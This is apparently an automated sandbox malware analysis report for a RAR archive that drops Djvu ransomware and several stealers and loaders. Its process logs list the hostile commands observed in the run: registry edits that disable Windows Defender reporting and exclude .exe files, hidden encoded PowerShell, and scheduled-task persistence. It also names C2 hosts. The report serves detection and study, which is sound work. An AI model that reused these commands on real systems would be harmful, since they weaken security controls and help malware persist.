Malware Analysis Report

2024-11-13 18:57

Sample ID 240223-vmbzvseg4s
Target file_release_4.rar
SHA256 e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5
Tags
djvu risepro smokeloader stealc zgrat pub3 backdoor discovery evasion ransomware rat spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e3683f1a58054c1166a94d5758848ed053777c7dc575a7af69c938b39f204eb5

Threat Level: Known bad

The file file_release_4.rar was found to be: Known bad.

Malicious Activity Summary

djvu risepro smokeloader stealc zgrat pub3 backdoor discovery evasion ransomware rat spyware stealer themida trojan

ZGRat

RisePro

Detected Djvu ransomware

Djvu Ransomware

Stealc

Detect ZGRat V1

SmokeLoader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Themida packer

Modifies file permissions

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Unexpected DNS network traffic destination

Checks whether UAC is enabled

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Unsigned PE

Program crash

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 17:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:10

Platform

win10v2004-20240221-en

Max time kernel

147s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 1.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 175.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 200.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:10

Platform

win10v2004-20240221-en

Max time kernel

143s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4764 wrote to memory of 1892 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4764 wrote to memory of 1892 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4764 wrote to memory of 1892 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 204.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:10

Platform

win10v2004-20240221-en

Max time kernel

126s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2116 wrote to memory of 4272 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2116 wrote to memory of 4272 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2116 wrote to memory of 4272 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4272 -ip 4272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4272 -s 588

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 196.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 200.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:09

Platform

win10v2004-20240221-en

Max time kernel

33s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Documents\GuardFox\oPAY0atGsFrz5J6mweTZuaDf.exe

"C:\Users\Admin\Documents\GuardFox\oPAY0atGsFrz5J6mweTZuaDf.exe"

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

"C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe"

C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe

"C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe"

C:\Users\Admin\Documents\GuardFox\fVLq49qtba3ytPK4Nw9io13j.exe

"C:\Users\Admin\Documents\GuardFox\fVLq49qtba3ytPK4Nw9io13j.exe"

C:\Users\Admin\Documents\GuardFox\Mi6AWN9vXRBRMcYeS_3_zVDQ.exe

"C:\Users\Admin\Documents\GuardFox\Mi6AWN9vXRBRMcYeS_3_zVDQ.exe"

C:\Users\Admin\Documents\GuardFox\pPrCgUdP2JClGnpyLmHJPscG.exe

"C:\Users\Admin\Documents\GuardFox\pPrCgUdP2JClGnpyLmHJPscG.exe"

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

"C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe"

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

"C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5752 -ip 5752

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe"

C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe

"C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe"

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

"C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCBD.tmp\Install.exe

.\Install.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\22158657-fbde-415a-bad4-5bee4646aa0b" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\7zS23CF.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -s

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -i

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\WW9_64.exe

"C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe"

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe"

C:\Users\Admin\Documents\GuardFox\6mW5b4qOjpVvTGG_x07s4stc.exe

"C:\Users\Admin\Documents\GuardFox\6mW5b4qOjpVvTGG_x07s4stc.exe"

C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe

"C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 344

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

"C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe"

C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe

"C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe"

C:\Users\Admin\AppData\Local\Temp\is-VM79T.tmp\eQYk_b6jz16mJKmMtyzJXk5e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VM79T.tmp\eQYk_b6jz16mJKmMtyzJXk5e.tmp" /SL5="$20272,4460890,54272,C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe"

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

"C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe"

C:\Users\Admin\Documents\GuardFox\gA119GY6BxzJ20qiar2SBob6.exe

"C:\Users\Admin\Documents\GuardFox\gA119GY6BxzJ20qiar2SBob6.exe"

C:\Users\Admin\Documents\GuardFox\tICD3_G5dCLsOTlSefOYkF5v.exe

"C:\Users\Admin\Documents\GuardFox\tICD3_G5dCLsOTlSefOYkF5v.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc74599758,0x7ffc74599768,0x7ffc74599778

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

"C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2132 -ip 2132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 568

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:8

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3008 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:2

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4124 --field-trial-handle=1884,i,1276832457716980050,7805439732190620183,131072 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6116 -ip 6116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5736 -ip 5736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 2244

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 2368

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gloyEKczR" /SC once /ST 10:59:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gloyEKczR"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\2g1j7SGm0vjI4nkHAuJW.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\2g1j7SGm0vjI4nkHAuJW.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

